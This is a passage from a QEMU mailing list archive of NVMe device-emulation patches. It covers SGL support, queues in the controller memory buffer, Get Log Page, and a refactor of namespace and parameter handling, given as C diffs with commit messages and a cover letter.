**errp)
 }
 cmd = (NvmeCmd) {
 .opcode = NVME_ADM_CMD_CREATE_CQ,
-.prp1 = cpu_to_le64(q->cq.iova),
+.dptr.prp.prp1 = cpu_to_le64(q->cq.iova),
 .cdw10 = cpu_to_le32(((queue_size - 1) << 16) | (n & 0xffff)),
 .cdw11 = cpu_to_le32(0x3),
 };
@@ -523,7 +523,7 @@ static bool nvme_add_io_queue(BlockDriverState *bs, Error 
**errp)
 }
 cmd = (NvmeCmd) {
 .opcode = NVME_ADM_CMD_CREATE_SQ,
-.prp1 = cpu_to_le64(q->sq.iova),
+.dptr.prp.prp1 = cpu_to_le64(q->sq.iova),
 .cdw10 = cpu_to_le32(((queue_size - 1) << 16) | (n & 0xffff)),
 .cdw11 = cpu_to_le32(0x1 | (n << 16)),
 };
@@ -858,16 +858,16 @@ try_map:
 case 0:
 abort();
 case 1:
-cmd->prp1 = pagelist[0];
-cmd->prp2 = 0;
+cmd->dptr.prp.prp1 = pagelist[0];
+cmd->dptr.prp.prp2 = 0;
 break;
 case 2:
-cmd->prp1 = pagelist[0];
-cmd->prp2 = pagelist[1];
+cmd->dptr.prp.prp1 = pagelist[0];
+cmd->dptr.prp.prp2 = pagelist[1];
 break;
 default:
-cmd->prp1 = pagelist[0];
-cmd->prp2 = cpu_to_le64(req->prp_list_iova + sizeof(uint64_t));
+cmd->dptr.prp.prp1 = pagelist[0];
+cmd->dptr.prp.prp2 = cpu_to_le64(req->prp_list_iova + 
sizeof(uint64_t));
 break;
 }
 trace_nvme_cmd_map_qiov(s, cmd, req, qiov, entries);
diff --git a/hw/block/nvme.c b/hw/block/nvme.c
index b285119fd29a..6bf62952dd13 100644
--- a/hw/block/nvme.c
+++ b/hw/block/nvme.c
@@ -273,6 +273,198 @@ unmap:
 return status;
 }
 
+static uint16_t nvme_map_sgl_data(NvmeCtrl *n, QEMUSGList *qsg,
+NvmeSglDescriptor *segment, uint64_t nsgld, uint32_t *len,
+NvmeRequest *req)
+{
+dma_addr_t addr, trans_len;
+
+for (int i = 0; i < nsgld; i++) {
+if (NVME_SGL_TYPE(segment[i].type) != SGL_DESCR_TYPE_DATA_BLOCK) {
+trace_nvme_err_invalid_sgl_descriptor(req->cqe.cid,
+NVME_SGL_TYPE(segment[i].type));
+return NVME_SGL_DESCRIPTOR_TYPE_INVALID | NVME_DNR;
+}
+
+if (*len == 0) {
+if (!NVME_CTRL_SGLS_EXCESS_LENGTH(n->id_ctrl.sgls)) {
+trace_nvme_err_invalid_sgl_excess_length(req->cqe.cid);
+return NVME_DATA_SGL_LENGTH_INVALID | NVME_DNR;
+}
+
+break;
+}
+
+addr = le64_to_cpu(segment[i].addr);
+trans_len = MIN(*len, le64_to_cpu(segment[i].len));
+
+if (nvme_addr_is_cmb(n, addr)) {
+/*
+ * All data and metadata, if any, associated with a particular
+ * command shall be located in either the CMB or host memory. Thus,
+ * if an address is found to be in the CMB and we have already
+ * mapped data that is in host memory, the use is invalid.
+ */
+if (!req->is_cmb && qsg->size) {
+return NVME_INVALID_USE_OF_CMB | NVME_DNR;
+}
+
+req->is_cmb = true;
+} else {
+/*
+ * Similarly, if the address does not reference the CMB, but we
+ * have already established that the request has data or metadata
+ * in the CMB, the use is invalid.
+ */
+if (req->is_cmb) {
+return NVME_INVALID_USE_OF_CMB | NVME_DNR;
+}
+}
+
+qemu_sglist_add(qsg, addr, trans_len);
+
+*len -= trans_len;
+}
+
+return NVME_SUCCESS;
+}
+
+static uint16_t nvme_map_sgl(NvmeCtrl *n, QEMUSGList *qsg,
+NvmeSglDescriptor sgl, uint32_t len, NvmeRequest *req)
+{
+const int MAX_NSGLD = 256;
+
+NvmeSglDescriptor segment[MAX_NSGLD];
+uint64_t nsgld;
+uint16_t status;
+bool sgl_in_cmb = false;
+hwaddr addr = le64_to_cpu(sgl.addr);
+
+trace_nvme_map_sgl(req->cqe.cid, NVME_SGL_TYPE(sgl.type), req->nlb, len);
+
+pci_dma_sglist_init(qsg, &n->parent_obj, 1);
+
+/*
+ * If the entire 

[Qemu-block] [PATCH 06/16] nvme: support completion queue in cmb

2019-07-05 Thread Klaus Birkelund Jensen
While not particularly useful, allow completion queues in the controller
memory buffer. Could be useful for testing.

Signed-off-by: Klaus Birkelund Jensen 
---
 hw/block/nvme.c | 16 +---
 1 file changed, 13 insertions(+), 3 deletions(-)

diff --git a/hw/block/nvme.c b/hw/block/nvme.c
index 3c392dc336a8..b31e5ff681bd 100644
--- a/hw/block/nvme.c
+++ b/hw/block/nvme.c
@@ -57,6 +57,16 @@ static void nvme_addr_read(NvmeCtrl *n, hwaddr addr, void 
*buf, int size)
 }
 }
 
+static void nvme_addr_write(NvmeCtrl *n, hwaddr addr, void *buf, int size)
+{
+if (n->cmbsz && addr >= n->ctrl_mem.addr &&
+addr < (n->ctrl_mem.addr + int128_get64(n->ctrl_mem.size))) {
+memcpy((void *)&n->cmbuf[addr - n->ctrl_mem.addr], buf, size);
+return;
+}
+pci_dma_write(&n->parent_obj, addr, buf, size);
+}
+
 static int nvme_check_sqid(NvmeCtrl *n, uint16_t sqid)
 {
 return sqid < n->params.num_queues && n->sq[sqid] != NULL ? 0 : -1;
@@ -276,6 +286,7 @@ static void nvme_post_cqes(void *opaque)
 
 QTAILQ_FOREACH_SAFE(req, &cq->req_list, entry, next) {
 NvmeSQueue *sq;
+NvmeCqe *cqe = &req->cqe;
 hwaddr addr;
 
 if (nvme_cq_full(cq)) {
@@ -289,8 +300,7 @@ static void nvme_post_cqes(void *opaque)
 req->cqe.sq_head = cpu_to_le16(sq->head);
 addr = cq->dma_addr + cq->tail * n->cqe_size;
 nvme_inc_cq_tail(cq);
-pci_dma_write(&n->parent_obj, addr, (void *)&req->cqe,
-sizeof(req->cqe));
+nvme_addr_write(n, addr, (void *) cqe, sizeof(*cqe));
 QTAILQ_INSERT_TAIL(&sq->req_list, req, entry);
 }
 if (cq->tail != cq->head) {
@@ -1399,7 +1409,7 @@ static void nvme_realize(PCIDevice *pci_dev, Error **errp)
 NVME_CMBLOC_SET_OFST(n->bar.cmbloc, 0);
 
 NVME_CMBSZ_SET_SQS(n->bar.cmbsz, 1);
-NVME_CMBSZ_SET_CQS(n->bar.cmbsz, 0);
+NVME_CMBSZ_SET_CQS(n->bar.cmbsz, 1);
 NVME_CMBSZ_SET_LISTS(n->bar.cmbsz, 0);
 NVME_CMBSZ_SET_RDS(n->bar.cmbsz, 1);
 NVME_CMBSZ_SET_WDS(n->bar.cmbsz, 1);
-- 
2.20.1




[Qemu-block] [PATCH 00/16] nvme: support NVMe v1.3d, SGLs and multiple namespaces

2019-07-05 Thread Klaus Birkelund Jensen
Matt Fitzpatrick's post ("[RFC,v1] Namespace Management Support") pushed
me to finally get my head out of my a** and post this series.

This is basically a follow-up to my previous series ("nvme: v1.3, sgls,
metadata and new 'ocssd' device"), but I'm not tagging it as a v2
because the patches for metadata and the ocssd device have been dropped.
Instead, this series also includes a patch that enables support for
multiple namespaces in a "proper" way by adding a new 'nvme-ns' device
model such that the "real" nvme device is composed of the 'nvme' device
model (the core controller) and multiple 'nvme-ns' devices that model
the namespaces.

All in all, the patches in this series should be less controversial, but
I know there is a lot to go through. I've kept commit 011de3d531b6
("nvme: refactor device realization") as a single commit, but I can chop
it up if any reviwers would prefer that, but the series is already at 16
patches. The refactor patch is basically just code movement.

At a glance, this series:

  - generally fixes up the device to be as close to NVMe 1.3d compliant as
possible (in terms of 'mandatory' features) by:
  - adding proper setting of the SUBNQN and VER fields
  - supporting the Abort command
  - supporting the Asynchronous Event Request command
  - supporting the Get Log Page command
  - providing reasonable stub responses to Get/Set Feature command of
mandatory features
  - adds support for scatter gather lists (SGLs)
  - simplifies DMA/CMB mappings and support PRPs/SGLs in the CMB
  - adds support for multiple block requests per nvme request (this is
useful for future support for metadata, OCSSD 2.0 vector requests
and upcoming zoned namespaces)
  - adds support for multiple namespaces
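
For readers who have not looked at SGLs before: the basic building block is
the 16-byte descriptor from NVM Express 1.3, section 4.4. Something of
roughly this shape ends up in include/block/nvme.h (field names here are
illustrative, not necessarily the exact ones in the patch):

    typedef struct NvmeSglDescriptor {
        uint64_t addr;      /* data block / segment address */
        uint32_t len;       /* length in bytes */
        uint8_t  rsvd[3];
        uint8_t  type;      /* descriptor type (bits 7:4), sub type (3:0) */
    } NvmeSglDescriptor;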


Thanks to everyone who chipped in on the discussion on multiple
namespaces! You're CC'ed ;)


Klaus Birkelund Jensen (16):
  nvme: simplify namespace code
  nvme: move device parameters to separate struct
  nvme: fix lpa field
  nvme: add missing fields in identify controller
  nvme: populate the mandatory subnqn and ver fields
  nvme: support completion queue in cmb
  nvme: support Abort command
  nvme: refactor device realization
  nvme: support Asynchronous Event Request command
  nvme: support Get Log Page command
  nvme: add missing mandatory Features
  nvme: bump supported NVMe revision to 1.3d
  nvme: simplify dma/cmb mappings
  nvme: support multiple block requests per request
  nvme: support scatter gather lists
  nvme: support multiple namespaces

 block/nvme.c   |   18 +-
 hw/block/Makefile.objs |2 +-
 hw/block/nvme-ns.c |  139 
 hw/block/nvme-ns.h |   35 +
 hw/block/nvme.c| 1629 
 hw/block/nvme.h|   99 ++-
 hw/block/trace-events  |   24 +-
 include/block/nvme.h   |  130 +++-
 8 files changed, 1739 insertions(+), 337 deletions(-)
 create mode 100644 hw/block/nvme-ns.c
 create mode 100644 hw/block/nvme-ns.h

-- 
2.20.1




[Qemu-block] [PATCH 02/16] nvme: move device parameters to separate struct

2019-07-05 Thread Klaus Birkelund Jensen
Move device configuration parameters to separate struct to make it
explicit what is configurable and what is set internally.

Also, clean up some includes.

Signed-off-by: Klaus Birkelund Jensen 
---
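For reviewers skimming: the point of the new struct is roughly the following
shape -- a sketch based on the fields referenced from nvme.c (serial,
num_queues, and later cmb_size_mb), not the literal nvme.h hunk:

    typedef struct NvmeParams {
        char     *serial;        /* mandatory; reported in Identify Controller */
        uint32_t num_queues;     /* number of queues the controller exposes */
        uint32_t cmb_size_mb;    /* Controller Memory Buffer size, 0 = no CMB */
    } NvmeParams;

NvmeCtrl then embeds a 'NvmeParams params' member, which is why the
n->num_queues / n->serial accesses below become n->params.*.
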
 hw/block/nvme.c | 54 +++--
 hw/block/nvme.h | 16 ---
 2 files changed, 38 insertions(+), 32 deletions(-)

diff --git a/hw/block/nvme.c b/hw/block/nvme.c
index 28ebaf1368b1..a3f83f3c2135 100644
--- a/hw/block/nvme.c
+++ b/hw/block/nvme.c
@@ -27,18 +27,14 @@
 
 #include "qemu/osdep.h"
 #include "qemu/units.h"
+#include "qemu/cutils.h"
+#include "qemu/log.h"
 #include "hw/block/block.h"
-#include "hw/hw.h"
 #include "hw/pci/msix.h"
-#include "hw/pci/pci.h"
 #include "sysemu/sysemu.h"
-#include "qapi/error.h"
-#include "qapi/visitor.h"
 #include "sysemu/block-backend.h"
+#include "qapi/error.h"
 
-#include "qemu/log.h"
-#include "qemu/module.h"
-#include "qemu/cutils.h"
 #include "trace.h"
 #include "nvme.h"
 
@@ -63,12 +59,12 @@ static void nvme_addr_read(NvmeCtrl *n, hwaddr addr, void 
*buf, int size)
 
 static int nvme_check_sqid(NvmeCtrl *n, uint16_t sqid)
 {
-return sqid < n->num_queues && n->sq[sqid] != NULL ? 0 : -1;
+return sqid < n->params.num_queues && n->sq[sqid] != NULL ? 0 : -1;
 }
 
 static int nvme_check_cqid(NvmeCtrl *n, uint16_t cqid)
 {
-return cqid < n->num_queues && n->cq[cqid] != NULL ? 0 : -1;
+return cqid < n->params.num_queues && n->cq[cqid] != NULL ? 0 : -1;
 }
 
 static void nvme_inc_cq_tail(NvmeCQueue *cq)
@@ -630,7 +626,7 @@ static uint16_t nvme_create_cq(NvmeCtrl *n, NvmeCmd *cmd)
 trace_nvme_err_invalid_create_cq_addr(prp1);
 return NVME_INVALID_FIELD | NVME_DNR;
 }
-if (unlikely(vector > n->num_queues)) {
+if (unlikely(vector > n->params.num_queues)) {
 trace_nvme_err_invalid_create_cq_vector(vector);
 return NVME_INVALID_IRQ_VECTOR | NVME_DNR;
 }
@@ -782,7 +778,8 @@ static uint16_t nvme_get_feature(NvmeCtrl *n, NvmeCmd *cmd, 
NvmeRequest *req)
 trace_nvme_getfeat_vwcache(result ? "enabled" : "disabled");
 break;
 case NVME_NUMBER_OF_QUEUES:
-result = cpu_to_le32((n->num_queues - 2) | ((n->num_queues - 2) << 
16));
+result = cpu_to_le32((n->params.num_queues - 2) |
+((n->params.num_queues - 2) << 16));
 trace_nvme_getfeat_numq(result);
 break;
 case NVME_TIMESTAMP:
@@ -827,9 +824,10 @@ static uint16_t nvme_set_feature(NvmeCtrl *n, NvmeCmd 
*cmd, NvmeRequest *req)
 case NVME_NUMBER_OF_QUEUES:
 trace_nvme_setfeat_numq((dw11 & 0x) + 1,
 ((dw11 >> 16) & 0x) + 1,
-n->num_queues - 1, n->num_queues - 1);
-req->cqe.result =
-cpu_to_le32((n->num_queues - 2) | ((n->num_queues - 2) << 16));
+n->params.num_queues - 1,
+n->params.num_queues - 1);
+req->cqe.result = cpu_to_le32((n->params.num_queues - 2) |
+((n->params.num_queues - 2) << 16));
 break;
 
 case NVME_TIMESTAMP:
@@ -903,12 +901,12 @@ static void nvme_clear_ctrl(NvmeCtrl *n)
 
 blk_drain(n->conf.blk);
 
-for (i = 0; i < n->num_queues; i++) {
+for (i = 0; i < n->params.num_queues; i++) {
 if (n->sq[i] != NULL) {
 nvme_free_sq(n->sq[i], n);
 }
 }
-for (i = 0; i < n->num_queues; i++) {
+for (i = 0; i < n->params.num_queues; i++) {
 if (n->cq[i] != NULL) {
 nvme_free_cq(n->cq[i], n);
 }
@@ -1311,7 +1309,7 @@ static void nvme_realize(PCIDevice *pci_dev, Error **errp)
 int64_t bs_size;
 uint8_t *pci_conf;
 
-if (!n->num_queues) {
+if (!n->params.num_queues) {
 error_setg(errp, "num_queues can't be zero");
 return;
 }
@@ -1327,7 +1325,7 @@ static void nvme_realize(PCIDevice *pci_dev, Error **errp)
 return;
 }
 
-if (!n->serial) {
+if (!n->params.serial) {
 error_setg(errp, "serial property not set");
 return;
 }
@@ -1344,24 +1342,24 @@ static void nvme_realize(PCIDevice *pci_dev, Error 
**errp)
 pcie_endpoint_cap_init(pci_dev, 0x80);
 
 n->num_namespaces = 1;
-n->reg_size = pow2ceil(0x1004 + 2 * (n->num_queues + 1) * 4);
+n->reg_size = pow2ceil(0x1004 + 2 * (n->params.num_queues + 1) * 4);
 n->ns_size = bs_size / (uint64_t)n->num_namespaces;
 
-n->sq = g_new0(NvmeSQueue *, n->num_queues);
-n->cq = g_new0(NvmeCQueue *, n->num_queues);
+n->sq = g_new0(NvmeSQueue *, n->params.num_queues);
+n->cq = g_new0(NvmeCQueue *, n->params.num_queues);
 
 memory_region_init_io(&n->iomem, OBJECT(n), &nvme_mmio_ops, n,
   "nvme", n->reg_size);
 pci_register_bar(pci_dev, 0,
 PCI_BASE_ADDRESS_SPACE_MEMORY | PCI_BASE_ADDRESS_MEM_TYPE_64,
 &n->iomem);
-msix_init_exclusive_bar(pci_dev, n->num_queues, 4, NULL);
+msix_init_exclusive_bar(pci_dev, 

[Qemu-block] [PATCH 04/16] nvme: add missing fields in identify controller

2019-07-05 Thread Klaus Birkelund Jensen
Not used by the device model but added for completeness. See NVM Express
1.2.1, Section 5.11 ("Identify command"), Figure 90.

Signed-off-by: Klaus Birkelund Jensen 
---
 include/block/nvme.h | 34 +-
 1 file changed, 29 insertions(+), 5 deletions(-)

diff --git a/include/block/nvme.h b/include/block/nvme.h
index 3ec8efcc435e..1b0accd4fe2b 100644
--- a/include/block/nvme.h
+++ b/include/block/nvme.h
@@ -543,7 +543,13 @@ typedef struct NvmeIdCtrl {
 uint8_t ieee[3];
 uint8_t cmic;
 uint8_t mdts;
-uint8_t rsvd255[178];
+uint16_t cntlid;
+uint32_t ver;
+uint16_t rtd3r;
+uint32_t rtd3e;
+uint32_t oaes;
+uint32_t ctratt;
+uint8_t rsvd255[156];
 uint16_t oacs;
 uint8_t acl;
 uint8_t aerl;
@@ -551,10 +557,22 @@ typedef struct NvmeIdCtrl {
 uint8_t lpa;
 uint8_t elpe;
 uint8_t npss;
-uint8_t rsvd511[248];
+uint8_t avscc;
+uint8_t apsta;
+uint16_t wctemp;
+uint16_t cctemp;
+uint16_t mtfa;
+uint32_t hmpre;
+uint32_t hmmin;
+uint8_t tnvmcap[16];
+uint8_t unvmcap[16];
+uint32_t rpmbs;
+uint8_t rsvd319[4];
+uint16_t kas;
+uint8_t rsvd511[190];
 uint8_t sqes;
 uint8_t cqes;
-uint16_t rsvd515;
+uint16_t maxcmd;
 uint32_t nn;
 uint16_t oncs;
 uint16_t fuses;
@@ -562,8 +580,14 @@ typedef struct NvmeIdCtrl {
 uint8_t vwc;
 uint16_t awun;
 uint16_t awupf;
-uint8_t rsvd703[174];
-uint8_t rsvd2047[1344];
+uint8_t nvscc;
+uint8_t rsvd531;
+uint16_t acwu;
+uint16_t rsvd535;
+uint32_t sgls;
+uint8_t rsvd767[228];
+uint8_t subnqn[256];
+uint8_t rsvd2047[1024];
 NvmePSD psd[32];
 uint8_t vs[1024];
 } NvmeIdCtrl;
-- 
2.20.1




[Qemu-block] [PATCH 10/16] nvme: support Get Log Page command

2019-07-05 Thread Klaus Birkelund Jensen
Add support for the Get Log Page command and stub/dumb implementations
of the mandatory Error Information, SMART/Health Information and
Firmware Slot Information log pages.

Required for compliance with NVMe revision 1.2.1. See NVM Express 1.2.1,
Section 5.10 ("Get Log Page command").

Signed-off-by: Klaus Birkelund Jensen 
---
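For orientation while reading the hunks below: the dispatcher decodes the
command the way the spec lays it out -- log page id and RAE in CDW10, the
0's-based dword count split over CDW10/CDW11, and the offset over
CDW12/CDW13. Roughly like this sketch (nvme_fw_log_info is an assumed name
for the firmware slot helper; the actual code may differ in detail):

    static uint16_t nvme_get_log(NvmeCtrl *n, NvmeCmd *cmd, NvmeRequest *req)
    {
        uint32_t dw10 = le32_to_cpu(cmd->cdw10);
        uint32_t dw11 = le32_to_cpu(cmd->cdw11);
        uint32_t dw12 = le32_to_cpu(cmd->cdw12);
        uint32_t dw13 = le32_to_cpu(cmd->cdw13);

        uint16_t lid = dw10 & 0xff;
        uint8_t  rae = (dw10 >> 15) & 0x1;
        uint32_t numd = ((dw11 & 0xffff) << 16) | (dw10 >> 16);
        uint32_t len = (numd + 1) << 2;          /* 0's based dword count */
        uint64_t off = ((uint64_t) dw13 << 32) | dw12;

        switch (lid) {
        case NVME_LOG_ERROR_INFO:
            return nvme_error_log_info(n, cmd, rae, len, off, req);
        case NVME_LOG_SMART_INFO:
            return nvme_smart_info(n, cmd, rae, len, off, req);
        case NVME_LOG_FW_SLOT_INFO:
            return nvme_fw_log_info(n, cmd, len, off, req);
        default:
            return NVME_INVALID_FIELD | NVME_DNR;
        }
    }
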
 hw/block/nvme.c   | 209 ++
 hw/block/nvme.h   |   3 +
 hw/block/trace-events |   3 +
 include/block/nvme.h  |   4 +-
 4 files changed, 217 insertions(+), 2 deletions(-)

diff --git a/hw/block/nvme.c b/hw/block/nvme.c
index a20576654f1b..93f5dff197e0 100644
--- a/hw/block/nvme.c
+++ b/hw/block/nvme.c
@@ -39,6 +39,8 @@
 #include "nvme.h"
 
 #define NVME_MAX_QS PCI_MSIX_FLAGS_QSIZE
+#define NVME_TEMPERATURE 0x143
+#define NVME_ELPE 3
 #define NVME_AERL 3
 #define NVME_OP_ABORTED 0xff
 #define NVME_GUEST_ERR(trace, fmt, ...) \
@@ -319,6 +321,36 @@ static void nvme_enqueue_req_completion(NvmeCQueue *cq, 
NvmeRequest *req)
 timer_mod(cq->timer, qemu_clock_get_ns(QEMU_CLOCK_VIRTUAL) + 500);
 }
 
+static void nvme_enqueue_event(NvmeCtrl *n, uint8_t event_type,
+uint8_t event_info, uint8_t log_page)
+{
+NvmeAsyncEvent *event;
+
+trace_nvme_enqueue_event(event_type, event_info, log_page);
+
+/*
+ * Do not enqueue the event if something of this type is already queued.
+ * This bounds the size of the event queue and makes sure it does not grow
+ * indefinitely when events are not processed by the host (i.e. does not
+ * issue any AERs).
+ */
+if (n->aer_mask_queued & (1 << event_type)) {
+return;
+}
+n->aer_mask_queued |= (1 << event_type);
+
+event = g_new(NvmeAsyncEvent, 1);
+event->result = (NvmeAerResult) {
+.event_type = event_type,
+.event_info = event_info,
+.log_page   = log_page,
+};
+
+QSIMPLEQ_INSERT_TAIL(&n->aer_queue, event, entry);
+
+timer_mod(n->aer_timer, qemu_clock_get_ns(QEMU_CLOCK_VIRTUAL) + 500);
+}
+
 static void nvme_process_aers(void *opaque)
 {
 NvmeCtrl *n = opaque;
@@ -831,6 +863,10 @@ static uint16_t nvme_get_feature(NvmeCtrl *n, NvmeCmd 
*cmd, NvmeRequest *req)
 uint32_t result;
 
 switch (dw10) {
+case NVME_TEMPERATURE_THRESHOLD:
+result = cpu_to_le32(n->features.temp_thresh);
+break;
+case NVME_ERROR_RECOVERY:
 case NVME_VOLATILE_WRITE_CACHE:
 result = blk_enable_write_cache(n->conf.blk);
 trace_nvme_getfeat_vwcache(result ? "enabled" : "disabled");
@@ -878,6 +914,13 @@ static uint16_t nvme_set_feature(NvmeCtrl *n, NvmeCmd 
*cmd, NvmeRequest *req)
 uint32_t dw11 = le32_to_cpu(cmd->cdw11);
 
 switch (dw10) {
+case NVME_TEMPERATURE_THRESHOLD:
+n->features.temp_thresh = dw11;
+if (n->features.temp_thresh <= n->temperature) {
+nvme_enqueue_event(n, NVME_AER_TYPE_SMART,
+NVME_AER_INFO_SMART_TEMP_THRESH, NVME_LOG_SMART_INFO);
+}
+break;
 case NVME_VOLATILE_WRITE_CACHE:
 blk_set_enable_write_cache(n->conf.blk, dw11 & 1);
 break;
@@ -902,6 +945,137 @@ static uint16_t nvme_set_feature(NvmeCtrl *n, NvmeCmd 
*cmd, NvmeRequest *req)
 return NVME_SUCCESS;
 }
 
+static void nvme_clear_events(NvmeCtrl *n, uint8_t event_type)
+{
+n->aer_mask &= ~(1 << event_type);
+if (!QSIMPLEQ_EMPTY(&n->aer_queue)) {
+timer_mod(n->aer_timer,
+qemu_clock_get_ns(QEMU_CLOCK_VIRTUAL) + 500);
+}
+}
+
+static uint16_t nvme_error_log_info(NvmeCtrl *n, NvmeCmd *cmd, uint8_t rae,
+uint32_t buf_len, uint64_t off, NvmeRequest *req)
+{
+uint32_t trans_len;
+uint64_t prp1 = le64_to_cpu(cmd->prp1);
+uint64_t prp2 = le64_to_cpu(cmd->prp2);
+
+if (off > sizeof(*n->elpes) * (NVME_ELPE + 1)) {
+return NVME_INVALID_FIELD | NVME_DNR;
+}
+
+trans_len = MIN(sizeof(*n->elpes) * (NVME_ELPE + 1) - off, buf_len);
+
+if (!rae) {
+nvme_clear_events(n, NVME_AER_TYPE_ERROR);
+}
+
+return nvme_dma_read_prp(n, (uint8_t *) n->elpes + off, trans_len, prp1,
+prp2);
+}
+
+static uint16_t nvme_smart_info(NvmeCtrl *n, NvmeCmd *cmd, uint8_t rae,
+uint32_t buf_len, uint64_t off, NvmeRequest *req)
+{
+uint64_t prp1 = le64_to_cpu(cmd->prp1);
+uint64_t prp2 = le64_to_cpu(cmd->prp2);
+
+uint32_t trans_len;
+time_t current_ms;
+NvmeSmartLog smart;
+
+if (cmd->nsid != 0 && cmd->nsid != 0xffffffff) {
+trace_nvme_err(req->cqe.cid, "smart log not supported for namespace",
+NVME_INVALID_FIELD | NVME_DNR);
+return NVME_INVALID_FIELD | NVME_DNR;
+}
+
+if (off > sizeof(smart)) {
+return NVME_INVALID_FIELD | NVME_DNR;
+}
+
+trans_len = MIN(sizeof(smart) - off, buf_len);
+
+memset(&smart, 0x0, sizeof(smart));
+smart.number_of_error_log_entries[0] = cpu_to_le64(0);
+smart.temperature[0] = n->temperature & 0xff;
+smart.temperature[1] = (n->temperature >> 8) & 0xff;
+
+

[Qemu-block] [PATCH 03/16] nvme: fix lpa field

2019-07-05 Thread Klaus Birkelund Jensen
The Log Page Attributes field in the Identify Controller structure
indicates that the controller supports the SMART / Health Information
log page on a per namespace basis. It does not, given that neither this
log page nor the Get Log Page command is implemented.

Signed-off-by: Klaus Birkelund Jensen 
---
 hw/block/nvme.c | 1 -
 1 file changed, 1 deletion(-)

diff --git a/hw/block/nvme.c b/hw/block/nvme.c
index a3f83f3c2135..ce2e5365385b 100644
--- a/hw/block/nvme.c
+++ b/hw/block/nvme.c
@@ -1366,7 +1366,6 @@ static void nvme_realize(PCIDevice *pci_dev, Error **errp)
 id->ieee[2] = 0xb3;
 id->oacs = cpu_to_le16(0);
 id->frmw = 7 << 1;
-id->lpa = 1 << 0;
 id->sqes = (0x6 << 4) | 0x6;
 id->cqes = (0x4 << 4) | 0x4;
 id->nn = cpu_to_le32(n->num_namespaces);
-- 
2.20.1




[Qemu-block] [PATCH 01/16] nvme: simplify namespace code

2019-07-05 Thread Klaus Birkelund Jensen
The device model currently supports only a single namespace and
explicitly sets num_namespaces to 1. Take this into account and
simplify the code.

Signed-off-by: Klaus Birkelund Jensen 
---
 hw/block/nvme.c | 26 +++---
 hw/block/nvme.h |  2 +-
 2 files changed, 8 insertions(+), 20 deletions(-)

diff --git a/hw/block/nvme.c b/hw/block/nvme.c
index 36d6a8bb3a3e..28ebaf1368b1 100644
--- a/hw/block/nvme.c
+++ b/hw/block/nvme.c
@@ -424,7 +424,7 @@ static uint16_t nvme_io_cmd(NvmeCtrl *n, NvmeCmd *cmd, 
NvmeRequest *req)
 return NVME_INVALID_NSID | NVME_DNR;
 }
 
-ns = &n->namespaces[nsid - 1];
+ns = &n->namespace;
 switch (cmd->opcode) {
 case NVME_CMD_FLUSH:
 return nvme_flush(n, ns, cmd, req);
@@ -670,7 +670,7 @@ static uint16_t nvme_identify_ns(NvmeCtrl *n, NvmeIdentify 
*c)
 return NVME_INVALID_NSID | NVME_DNR;
 }
 
-ns = &n->namespaces[nsid - 1];
+ns = &n->namespace;
 
 return nvme_dma_read_prp(n, (uint8_t *)&ns->id_ns, sizeof(ns->id_ns),
 prp1, prp2);
@@ -1306,8 +1306,8 @@ static void nvme_realize(PCIDevice *pci_dev, Error **errp)
 {
 NvmeCtrl *n = NVME(pci_dev);
 NvmeIdCtrl *id = &n->id_ctrl;
+NvmeIdNs *id_ns = &n->namespace.id_ns;
 
-int i;
 int64_t bs_size;
 uint8_t *pci_conf;
 
@@ -1347,7 +1347,6 @@ static void nvme_realize(PCIDevice *pci_dev, Error **errp)
 n->reg_size = pow2ceil(0x1004 + 2 * (n->num_queues + 1) * 4);
 n->ns_size = bs_size / (uint64_t)n->num_namespaces;
 
-n->namespaces = g_new0(NvmeNamespace, n->num_namespaces);
 n->sq = g_new0(NvmeSQueue *, n->num_queues);
 n->cq = g_new0(NvmeCQueue *, n->num_queues);
 
@@ -1416,20 +1415,10 @@ static void nvme_realize(PCIDevice *pci_dev, Error 
**errp)
 
 }
 
-for (i = 0; i < n->num_namespaces; i++) {
-NvmeNamespace *ns = &n->namespaces[i];
-NvmeIdNs *id_ns = &ns->id_ns;
-id_ns->nsfeat = 0;
-id_ns->nlbaf = 0;
-id_ns->flbas = 0;
-id_ns->mc = 0;
-id_ns->dpc = 0;
-id_ns->dps = 0;
-id_ns->lbaf[0].ds = BDRV_SECTOR_BITS;
-id_ns->ncap  = id_ns->nuse = id_ns->nsze =
-cpu_to_le64(n->ns_size >>
-id_ns->lbaf[NVME_ID_NS_FLBAS_INDEX(ns->id_ns.flbas)].ds);
-}
+id_ns->lbaf[0].ds = BDRV_SECTOR_BITS;
+id_ns->ncap  = id_ns->nuse = id_ns->nsze =
+cpu_to_le64(n->ns_size >>
+id_ns->lbaf[NVME_ID_NS_FLBAS_INDEX(id_ns->flbas)].ds);
 }
 
 static void nvme_exit(PCIDevice *pci_dev)
@@ -1437,7 +1426,6 @@ static void nvme_exit(PCIDevice *pci_dev)
 NvmeCtrl *n = NVME(pci_dev);
 
 nvme_clear_ctrl(n);
-g_free(n->namespaces);
 g_free(n->cq);
 g_free(n->sq);
 
diff --git a/hw/block/nvme.h b/hw/block/nvme.h
index 557194ee1954..40cedb1ec932 100644
--- a/hw/block/nvme.h
+++ b/hw/block/nvme.h
@@ -83,7 +83,7 @@ typedef struct NvmeCtrl {
 uint64_t timestamp_set_qemu_clock_ms; /* QEMU clock time */
 
 char *serial;
-NvmeNamespace   *namespaces;
+NvmeNamespace   namespace;
 NvmeSQueue  **sq;
 NvmeCQueue  **cq;
 NvmeSQueue  admin_sq;
-- 
2.20.1




[Qemu-block] [PATCH 08/16] nvme: refactor device realization

2019-07-05 Thread Klaus Birkelund Jensen
Signed-off-by: Klaus Birkelund Jensen 
---
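For orientation while reading the hunks below: realize is split into a set of
check/init helpers. The resulting control flow is roughly the following
sketch, using the helper names from the diff; error handling and ordering may
differ in detail from the actual hunk:

    static void nvme_realize(PCIDevice *pci_dev, Error **errp)
    {
        NvmeCtrl *n = NVME(pci_dev);
        Error *local_err = NULL;

        if (nvme_check_constraints(n, &local_err)) {
            error_propagate(errp, local_err);
            return;
        }

        nvme_init_state(n);

        if (nvme_init_blk(n, &local_err)) {
            error_propagate(errp, local_err);
            return;
        }

        nvme_init_pci(n, pci_dev);    /* also sets up the CMB, if configured */
        nvme_init_ctrl(n);

        /* namespace geometry (ns_size etc.) is set up after this */
    }
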
 hw/block/nvme.c | 196 ++--
 hw/block/nvme.h |  11 +++
 2 files changed, 152 insertions(+), 55 deletions(-)

diff --git a/hw/block/nvme.c b/hw/block/nvme.c
index 4b9ff51868c0..eb6af6508e2d 100644
--- a/hw/block/nvme.c
+++ b/hw/block/nvme.c
@@ -38,6 +38,7 @@
 #include "trace.h"
 #include "nvme.h"
 
